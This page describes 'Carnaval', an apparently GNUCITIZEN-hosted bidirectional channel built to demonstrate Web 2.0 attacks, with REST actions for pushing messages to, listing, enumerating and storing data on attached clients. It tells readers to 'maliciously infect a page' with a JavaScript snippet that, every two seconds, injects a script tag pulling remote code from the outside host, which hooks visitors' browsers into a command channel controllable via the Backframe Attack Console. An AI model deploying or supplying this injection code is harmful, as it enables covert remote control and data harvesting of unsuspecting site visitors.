Carnaval is a free bi-directional, persistent communication channel. At the moment the service is unrestricted. Depending on how it will be used this status may change.
Technically speaking, Carnaval is a communication channel which can be used as a message exchange mechanism between clients. In practice, Carnaval, can be used to construct chat rooms, online message broker applications, online games, etc. However, this project is specifically designed to be used as part of demonstration WEB2.0 attack vectors. As such, Carnaval was created for educational purposes only. GNUCITIZEN disclaims any responsibility for your own actions.
The channel is the only interactive part available in Carnaval. You can interact with it by using any of the following operations/actions:
ACTION: init – load initialization scripts
| Parameter | Description |
| (none) | (none) |
ACTION: pull – pull message from the message queue (default)
| Parameter | Description |
| callback | callback function to handle the message |
| referrer | the location of the calling client |
| id | the unique identifier of the calling client |
ACTION: push – push message to a client
| Parameter | Description |
| client | the unique client identifier the massage will be send to. If not supplied the message goes to everybody. |
| message | the message the be send |
| target | The same client could be attached on a single channel but from different locations. This feature enables precise message exchange communication. |
ACTION: list – list attached clients
| Parameter | Description |
| callback | callback function that handles the data |
ACTION: enum – enumerate attached clients by exposing their stored data
| Parameter | Description |
| callback | callback function that handles the data |
ACTION: view – view stored data for one or more attached clients
| Parameter | Description |
| client | the unique client identifier the stored data will be accessed from |
ACTION: save – store data for one or more attached clients
| Parameter | Description |
| client | the unique client identifier the stored data will be saved to. If not supplied the data will be saved globally. |
| name | name of the field |
| value | the data content |
The interaction process is REST (Representational State Transfer) based. You need to supply an appropriate action for each request. You can do that by appending action=[your action] after the question mark when calling Carnaval’s channel.
Carnaval is compatible with the Backframe Attack Console and the AttackAPI library. Building upon the Carnaval’s infrastructure is easy.
In order to try out the service you need to maliciously infect a page of your choice with the following code:
setInterval(function() {
var script = document.createElement('script');
script.type = 'text/javascript';
script.src = 'http://www.gnucitizen.org/carnaval/channel?action=pull';
document.body.appendChild(script);
}, 2000); void(0);Once the tracking code is in action, you will be able to communicate with it via Backframe, AttackAPI or by simply calling URLs compatible with Carnaval’s communication protocol:
http://www.gnucitizen.org/carnaval/channel?action=list&callback=myCallbackIn order to use Backframe, you have to load Carnaval’s channel into the console. Once Carnaval’s user interface is loaded, click on the Backframe link. That will take you to Backframe Attack Console. The console will ask you for confirmation to load a dynamic profile. After you confirm that, you will be able to communicate with the attached clients.
If you have a proposal, question, suggestion or correction, please contact us.
